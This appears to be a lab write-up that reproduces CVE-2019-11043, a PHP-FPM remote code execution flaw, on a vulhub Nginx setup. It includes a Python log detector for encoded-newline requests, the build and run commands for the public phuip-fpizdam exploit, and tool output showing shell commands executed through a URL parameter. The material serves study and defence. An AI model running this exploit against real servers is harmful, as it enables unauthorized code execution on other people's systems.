CVE-2019-11043 PHP-FPM RCE

Vulnerability description

When the fastcgi_split_path_info directive in Nginx is configured as ^(.+?\.php)(/.*)$, a newline character (%0a) in the request path can be used to bypass this regular expression: `.` does not match a newline, so the regex fails to match and $fastcgi_path_info (and therefore PATH_INFO) is left empty while the request is still passed to php-fpm.

Environment

Nginx + php-fpm

location ~ [^/]\.php(/|$) {
    ...
    fastcgi_split_path_info ^(.+?\.php)(/.*)$;
    fastcgi_param PATH_INFO $fastcgi_path_info;
    fastcgi_pass php:9000;
    ...
}
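As an added illustration that is not part of the original post, the following Python script reproduces the split regex from the location block above, shows that a decoded newline makes it fail to match, and scans constructed (not real) access-log lines for .php requests carrying an encoded newline, which is the indicator a defender would alert on:

```python
import re
from urllib.parse import unquote

# The same pattern the vulnerable nginx location uses for fastcgi_split_path_info.
# Without the DOTALL flag (nginx's PCRE default) '.' does not match '\n'.
SPLIT_PATH_INFO = re.compile(r'^(.+?\.php)(/.*)$')

# Extracts the request target from a combined-format access log line.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines for demonstration; the 502 mirrors the
# "Status code 502" probe result seen in the tool output further down.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Oct/2019:16:03:51 +0000] "GET /index.php/foo HTTP/1.1" 200 612 "-" "curl/7.64.0"
10.0.0.5 - - [25/Oct/2019:16:03:52 +0000] "GET /index.php/PHP%0aVALUE HTTP/1.1" 502 157 "-" "Go-http-client/1.1"
10.0.0.5 - - [25/Oct/2019:16:03:52 +0000] "GET /static/app.js HTTP/1.1" 200 1024 "-" "curl/7.64.0"
"""


def split_path_info(path):
    """Mimic nginx: return (script_name, path_info), or None when the regex
    does not match, which is exactly what leaves PATH_INFO empty."""
    m = SPLIT_PATH_INFO.match(path)
    if m is None:
        return None
    return m.group(1), m.group(2)


def is_suspicious(raw_target):
    """A .php request whose URL-decoded path contains a newline (%0a / %0d)
    is the bypass condition described above and should be alerted on."""
    path = unquote(raw_target.split('?', 1)[0])
    if '.php' not in path:
        return False
    return '\n' in path or '\r' in path or (
        '.php/' in path and split_path_info(path) is None)


def scan_log(text):
    """Return the raw request targets of suspicious lines in an access log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if m and is_suspicious(m.group('target')):
            hits.append(m.group('target'))
    return hits


# Mitigation on the nginx side (not shown in the original post): add
#   try_files $fastcgi_script_name =404;
# to the location block so requests for non-existent scripts never reach php-fpm.
if __name__ == '__main__':
    print(split_path_info('/index.php/foo'))         # ('/index.php', '/foo')
    print(split_path_info('/index.php/PHP\nVALUE'))  # None
    print(scan_log(SAMPLE_LOG))                       # ['/index.php/PHP%0aVALUE']
```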

The vulhub environment is used here.

After entering the php/CVE-2019-11043 directory:

docker-compose up -d

Tool preparation

Clone https://github.com/neex/phuip-fpizdam locally, then build it:

go build

An executable file is then generated in the phuip-fpizdam directory.

Execution

phuip-fpizdam.exe "http://192.168.136.128:9088/index.php"

2019/10/25 16:03:51 Base status code is 200
2019/10/25 16:03:52 Status code 502 for qsl=1795, adding as a candidate
2019/10/25 16:03:52 The target is probably vulnerable. Possible QSLs: [1785 1790 1795]
2019/10/25 16:03:52 Attack params found: --qsl 1790 --pisos 146 --skip-detect
2019/10/25 16:03:52 Trying to set "session.auto_start=0"...
2019/10/25 16:03:52 Detect() returned attack params: --qsl 1790 --pisos 146 --skip-detect <-- REMEMBER THIS
2019/10/25 16:03:52 Performing attack using php.ini settings...
2019/10/25 16:03:52 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2019/10/25 16:03:52 Trying to cleanup /tmp/a...
2019/10/25 16:03:52 Done!

Visit http://192.168.136.128:8005/?a=id

Reference

https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043

https://bugs.php.net/bug.php?id=78599